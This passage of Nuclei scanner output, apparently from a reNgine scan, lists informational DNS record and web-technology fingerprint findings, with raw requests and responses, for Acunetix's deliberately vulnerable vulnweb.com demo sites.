server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 39373\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 39373\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.214806701Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 59148\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 59148\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86393\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:40.217588135Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 12475\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12475\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.217764336Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 42504\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42504\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.218427059Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 58030\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58030\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.232164193Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 12862\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12862\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.233112443Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 25516\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 25516\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.236874716Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:40.546904766Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"ms-iis\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:40.5470491Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology 